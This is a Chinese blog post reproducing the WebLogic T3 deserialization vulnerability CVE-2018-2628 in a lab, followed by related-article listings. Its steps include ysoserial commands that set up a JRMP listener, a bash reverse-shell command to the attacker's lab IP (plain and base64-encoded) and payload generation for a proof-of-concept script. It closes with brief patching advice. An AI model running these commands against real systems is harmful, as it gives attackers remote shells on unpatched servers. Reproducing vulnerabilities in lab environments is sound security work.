Weblogic反序列化命令执行漏洞(CVE-2018-2628)复现

最新推荐文章于 2023-04-16 17:25:25 发布
最新推荐文章于 2023-04-16 17:25:25 发布
阅读量1w 收藏 18
点赞数 7
分类专栏: vulhub漏洞复现 文章标签: linux 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744814/article/details/120229347
版权

目录

0x01 漏洞介绍

  1. 漏洞描述
    Weblogic Server WLS Core Components反序列化命令执行漏洞(CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令

  2. 漏洞编号
    CVE-2018-2628

  3. 受影响版本
    Weblogic 10.3.6.0
    Weblogic 12.1.3.0
    Weblogic 12.2.1.2
    Weblogic 12.2.1.3

0x02 环境部署:

搭建一次,复现百次
靶机 ip:192.168.30.209
kali ip:192.168.30.182

0x03 漏洞复现

1. 查看T3服务

在kali上使用脚本weblogic-t3-info扫描目标主机是否开启T3服务
在这里插入图片描述
从扫描结果可以看出目标主机已开启T3服务

2. 下载检测漏洞脚本,并进行解压
git clone https://codechina.csdn.net/mirrors/Lighird/CVE-2018-2628.git

在这里插入图片描述
解压:

unrar x CVE-2018-2628.rar /root/CVE-2018-2628

在这里插入图片描述

3. 设置所要检测的ip, 并运行脚本

在这里插入图片描述
在这里插入图片描述

python CVE-2018-2628-MultiThreading.py

在这里插入图片描述
出现is vul CVE-2018-2628说明漏洞存在,接下来我们开始复现

4. 启动JRMP Server

目的是为了使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#[listen port]是需要JRMP Server监听的端口,这个端口的作用是为了让目的主机上weblogic进行远程调用kali方法时,可以连接到我们自己的主机
#[command]为要执行的命令

以下我们执行反弹shell命令,我们需要注意需要对执行的命令进行需要进行一次编码,因为 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法
编码网址
在这里插入图片描述

#java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -i >& /dev/tcp/192.168.30.182/1234 0>&1'
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjE4Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'

在这里插入图片描述
最后一行出现 * Opening JRMP listener on 8888,说明JRMP Server正在监听8888端口

5. 制作Payload

在kali上打开一个新终端,使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一个payload,因为要实现weblogic远程调用kali方法,所以就需要知道kali主机的ip与端口

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.30.182:8888 | xxd -p | tr -d $'\n' && echo

在这里插入图片描述

6. 导入Payload并修改目的IP

将weblogic_poc.py中的使用的payload替换为我们刚刚生成的payload,并且将目标ip

vim weblogic_poc.py

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

7. 进行监听端口1234

在这里插入图片描述

8. 执行脚本weblogic_poc.py

在这里插入图片描述

9. 反弹shell成功

在这里插入图片描述

0x04 漏洞修复

  1. 官方补丁:T3协议漏洞加固的话可以打上官方最新的补丁,可使用正版软件许可账户登录 https://support.oracle.com,下载最新补丁。
  2. 手工修复:控制T3协议的访问权限来临时阻断漏洞利用。
君莫hacker
关注
  • 7
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Weblogic 序列命令执行漏洞CVE-2018-2628)漏洞【vulhub靶场】
m0_55854679的博客
08-08 1365
WebLogic 里,攻击者利用其他rmi【远程方法调用】绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成序列远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。......
Weblogic WLS Core Components 序列命令执行漏洞CVE-2018-2628)
huangyongkang666的博客
07-25 643
Weblogic WLS Core Components 序列命令执行漏洞CVE-2018-2628)
weblogic CVE-2018-2628
Armandhe的博客
06-15 2922
无言
Weblogic CVE-2018-2628 T3协议序列命令执行漏洞
读书 买花 长大
02-19 880
CVE-2018-2628
weblogic cve-2018-2628
sojrs_sec的博客
12-24 878
前言 前面有分析过cve-2017-10271的xml序列漏洞,这次挑了cve-2018-2628尝试着分析看看,相比较xml序列只要一个http包而言,T3协议的序列利用过程显得更加杂一些,因此在正式分析之前,这里做个简单先把的过程记录一下 环境 被攻击机 192.168.99.37 Ubuntu16 Vulhub 攻击机 Mac 192.168.96.111 步骤 Ubu...
WebLogic T3 序列绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6870
WebLogic T3 序列绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic序列远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic序列远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic序列远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象序列过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
Weblogic序列远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
Java序列漏洞利用工具(WebLogic&Jboss)
01-01
使用注意: 1. WebLogic弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实网上公布的代码执行弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic序列漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2023-21839:Weblogic序列漏洞
薛定谔嘚喵博客
04-16 3812
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic序列漏洞(CVE-2018-2628)
DaWan
09-21 990
Weblogic序列漏洞(CVE-2018-2628环境搭建工具准备漏洞 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:https://www.exploit-db.com/exploits/44553 漏洞 使用namp查看是否启用T3协议: nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161 启动JRMP Se
Weblogic 漏洞
Knsec
06-03 2611
Weblogic 漏洞
Weblogic-JAVA序列CVE-2018-2628)
qq_43381463的博客
03-28 178
漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令
Weblogic WLS Core Components 序列命令执行漏洞CVE-2018-2628)
s1056481432的博客
08-02 818
漏洞介绍 Oracle 2018年4月补丁中,修Weblogic Server WLS Core Components中出的一个序列漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞环境 我这里是直接用vulhub搭建环境的官网:https://vulhub.org/,使用方法很简单直接git clone https://github.com/vulhub/vulhub.git 就可以了,之后到下载的文件夹找到我们要漏洞的文件夹
以下Weblogic漏洞序列的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
最新发布
06-08
以下Weblogic漏洞序列的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的序列漏洞是一种常见的安全漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值